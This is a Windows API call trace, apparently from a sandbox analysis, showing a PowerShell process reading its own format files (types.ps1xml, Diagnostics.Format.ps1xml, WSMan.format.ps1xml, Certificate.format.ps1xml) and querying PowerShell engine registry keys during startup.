	[0802.756] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.756] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.757] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.757] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.757] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.765] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.765] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.766] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.766] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.766] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.767] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.767] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.768] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.768] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1b4, lpOverlapped=0x0) returned 1
	[0802.768] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x0, lpOverlapped=0x0) returned 1
	[0802.768] CloseHandle (hObject=0x320) returned 1
	[0802.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0802.768] SetErrorMode (uMode=0x1) returned 0x1
	[0802.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd560 | out: lpFileInformation=0x1cd560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0802.769] SetErrorMode (uMode=0x1) returned 0x1
	[0802.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0802.769] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd648 | out: phkResult=0x1cd648*=0x320) returned 0x0
	[0802.769] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd5cc, lpData=0x0, lpcbData=0x1cd5c8*=0x0 | out: lpType=0x1cd5cc*=0x1, lpData=0x0, lpcbData=0x1cd5c8*=0x56) returned 0x0
	[0802.769] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ef790
	[0802.769] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd59c, lpData=0x1b8ef790, lpcbData=0x1cd598*=0x56 | out: lpType=0x1cd59c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd598*=0x56) returned 0x0
	[0802.770] CoTaskMemFree (pv=0x1b8ef790) 
	[0802.770] RegCloseKey (hKey=0x320) returned 0x0
	[0802.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0802.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0809.925] VirtualQuery (in: lpAddress=0x1cc330, lpBuffer=0x1cd1f0, dwLength=0x30 | out: lpBuffer=0x1cd1f0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0811.965] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0811.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0811.965] CoTaskMemFree (pv=0x2d4e20) 
	[0813.369] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd7e8 | out: phkResult=0x1cd7e8*=0x308) returned 0x0
	[0813.369] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x1cd7fc, lpData=0x0, lpcbData=0x1cd7f8*=0x0 | out: lpType=0x1cd7fc*=0x1, lpData=0x0, lpcbData=0x1cd7f8*=0x74) returned 0x0
	[0813.369] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x1cd76c, lpData=0x0, lpcbData=0x1cd768*=0x0 | out: lpType=0x1cd76c*=0x1, lpData=0x0, lpcbData=0x1cd768*=0x74) returned 0x0
	[0813.369] CoTaskMemAlloc (cb=0x78) returned 0x25f2a0
	[0813.369] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x1cd73c, lpData=0x25f2a0, lpcbData=0x1cd738*=0x74 | out: lpType=0x1cd73c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd738*=0x74) returned 0x0
	[0813.370] CoTaskMemFree (pv=0x25f2a0) 
	[0813.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0813.370] SetErrorMode (uMode=0x1) returned 0x1
	[0813.370] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd6c0 | out: lpFileInformation=0x1cd6c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0813.370] SetErrorMode (uMode=0x1) returned 0x1
	[0814.554] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0814.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0814.554] CoTaskMemFree (pv=0x2d4e20) 
	[0814.565] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0814.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0814.565] CoTaskMemFree (pv=0x2d4e20) 
	[0814.567] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0814.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0814.567] CoTaskMemFree (pv=0x2d4e20) 
	[0814.569] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0814.569] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0814.569] CoTaskMemFree (pv=0x2d4e20) 
	[0814.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0814.570] SetErrorMode (uMode=0x1) returned 0x1
	[0814.570] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0814.570] GetFileType (hFile=0x318) returned 0x1
	[0814.570] SetErrorMode (uMode=0x1) returned 0x1
	[0814.571] GetFileType (hFile=0x318) returned 0x1
	[0814.571] ReadFile (in: hFile=0x318, lpBuffer=0x34bfb20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34bfb20*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0814.573] ReadFile (in: hFile=0x318, lpBuffer=0x34bfb20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34bfb20*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0814.573] ReadFile (in: hFile=0x318, lpBuffer=0x34bfb20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34bfb20*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0814.573] ReadFile (in: hFile=0x318, lpBuffer=0x34bfb20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34bfb20*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0814.574] ReadFile (in: hFile=0x318, lpBuffer=0x34bfb20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34bfb20*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0814.574] ReadFile (in: hFile=0x318, lpBuffer=0x34bfb20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34bfb20*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0814.575] ReadFile (in: hFile=0x318, lpBuffer=0x34bfb20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34bfb20*, lpNumberOfBytesRead=0x1cd358*=0x9e2, lpOverlapped=0x0) returned 1
	[0814.575] ReadFile (in: hFile=0x318, lpBuffer=0x34bf06a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34bf06a*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0814.575] ReadFile (in: hFile=0x318, lpBuffer=0x34bfb20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34bfb20*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0814.575] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x318) returned 0x0
	[0814.575] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd36c, lpData=0x0, lpcbData=0x1cd368*=0x0 | out: lpType=0x1cd36c*=0x1, lpData=0x0, lpcbData=0x1cd368*=0x56) returned 0x0
	[0814.575] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ef720
	[0814.575] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd33c, lpData=0x1b8ef720, lpcbData=0x1cd338*=0x56 | out: lpType=0x1cd33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd338*=0x56) returned 0x0
	[0814.576] CoTaskMemFree (pv=0x1b8ef720) 
	[0814.576] RegCloseKey (hKey=0x318) returned 0x0
	[0814.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0814.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0816.008] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xc16b3e47, Data2=0x89b5, Data3=0x4c68, Data4=([0]=0xab, [1]=0x21, [2]=0x1f, [3]=0x8b, [4]=0xe1, [5]=0x13, [6]=0x8b, [7]=0xbf))) returned 0x0
	[0816.028] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe3ebf592, Data2=0x93ca, Data3=0x457b, Data4=([0]=0x81, [1]=0x1b, [2]=0xa6, [3]=0xde, [4]=0x4d, [5]=0x10, [6]=0x3b, [7]=0xbf))) returned 0x0
	[0816.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0816.032] SetErrorMode (uMode=0x1) returned 0x1
	[0816.032] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0816.032] GetFileType (hFile=0x318) returned 0x1
	[0816.032] SetErrorMode (uMode=0x1) returned 0x1
	[0816.032] GetFileType (hFile=0x318) returned 0x1
	[0816.032] ReadFile (in: hFile=0x318, lpBuffer=0x34ea688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34ea688*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0816.034] ReadFile (in: hFile=0x318, lpBuffer=0x34ea688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34ea688*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0816.036] ReadFile (in: hFile=0x318, lpBuffer=0x34ea688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34ea688*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0816.037] ReadFile (in: hFile=0x318, lpBuffer=0x34ea688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34ea688*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0816.037] ReadFile (in: hFile=0x318, lpBuffer=0x34ea688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34ea688*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0816.039] ReadFile (in: hFile=0x318, lpBuffer=0x34ea688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34ea688*, lpNumberOfBytesRead=0x1cd358*=0xfb2, lpOverlapped=0x0) returned 1
	[0816.039] ReadFile (in: hFile=0x318, lpBuffer=0x34e9da2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34e9da2*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0816.039] ReadFile (in: hFile=0x318, lpBuffer=0x34ea688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x34ea688*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0816.039] CloseHandle (hObject=0x318) returned 1
	[0816.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0816.040] SetErrorMode (uMode=0x1) returned 0x1
	[0816.040] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd300 | out: lpFileInformation=0x1cd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0816.040] SetErrorMode (uMode=0x1) returned 0x1
	[0816.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0816.040] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x318) returned 0x0
	[0816.040] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd36c, lpData=0x0, lpcbData=0x1cd368*=0x0 | out: lpType=0x1cd36c*=0x1, lpData=0x0, lpcbData=0x1cd368*=0x56) returned 0x0
	[0816.040] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ef640
	[0816.040] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd33c, lpData=0x1b8ef640, lpcbData=0x1cd338*=0x56 | out: lpType=0x1cd33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd338*=0x56) returned 0x0
	[0816.041] CoTaskMemFree (pv=0x1b8ef640) 
	[0816.041] RegCloseKey (hKey=0x318) returned 0x0
	[0816.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0816.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0817.530] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe20226fa, Data2=0xf9c8, Data3=0x4766, Data4=([0]=0x94, [1]=0x16, [2]=0x9c, [3]=0x0, [4]=0xe3, [5]=0x97, [6]=0x18, [7]=0x97))) returned 0x0
	[0817.535] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xc0c69852, Data2=0x126f, Data3=0x46c0, Data4=([0]=0xab, [1]=0x25, [2]=0x4d, [3]=0x68, [4]=0x1a, [5]=0x1f, [6]=0x75, [7]=0x4e))) returned 0x0
	[0817.536] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xa81da944, Data2=0xb9a1, Data3=0x4be9, Data4=([0]=0x91, [1]=0xc4, [2]=0x7, [3]=0xf7, [4]=0xf8, [5]=0xcd, [6]=0x4d, [7]=0x54))) returned 0x0
	[0817.538] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x2567040b, Data2=0x75b5, Data3=0x494c, Data4=([0]=0x93, [1]=0x90, [2]=0x3c, [3]=0x89, [4]=0x7c, [5]=0xd0, [6]=0x4c, [7]=0x4a))) returned 0x0
	[0817.539] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xd8ab364a, Data2=0xb8f6, Data3=0x451e, Data4=([0]=0x9d, [1]=0xd5, [2]=0x4b, [3]=0x4f, [4]=0x82, [5]=0x49, [6]=0x18, [7]=0x23))) returned 0x0
	[0817.540] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xbd38a5, Data2=0xff6a, Data3=0x48ea, Data4=([0]=0xa4, [1]=0x78, [2]=0xaf, [3]=0xcd, [4]=0x3d, [5]=0x43, [6]=0x3a, [7]=0x6c))) returned 0x0
	[0817.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0817.540] SetErrorMode (uMode=0x1) returned 0x1
	[0817.540] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0817.541] GetFileType (hFile=0x308) returned 0x1
	[0817.541] SetErrorMode (uMode=0x1) returned 0x1
	[0817.541] GetFileType (hFile=0x308) returned 0x1
	[0817.541] ReadFile (in: hFile=0x308, lpBuffer=0x339d128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x339d128*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0817.541] ReadFile (in: hFile=0x308, lpBuffer=0x339d128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x339d128*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0817.541] ReadFile (in: hFile=0x308, lpBuffer=0x339d128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x339d128*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0817.542] ReadFile (in: hFile=0x308, lpBuffer=0x339d128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x339d128*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0817.542] ReadFile (in: hFile=0x308, lpBuffer=0x339d128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x339d128*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0817.542] ReadFile (in: hFile=0x308, lpBuffer=0x339d128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x339d128*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0817.542] ReadFile (in: hFile=0x308, lpBuffer=0x339d128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x339d128*, lpNumberOfBytesRead=0x1cd358*=0xaca, lpOverlapped=0x0) returned 1
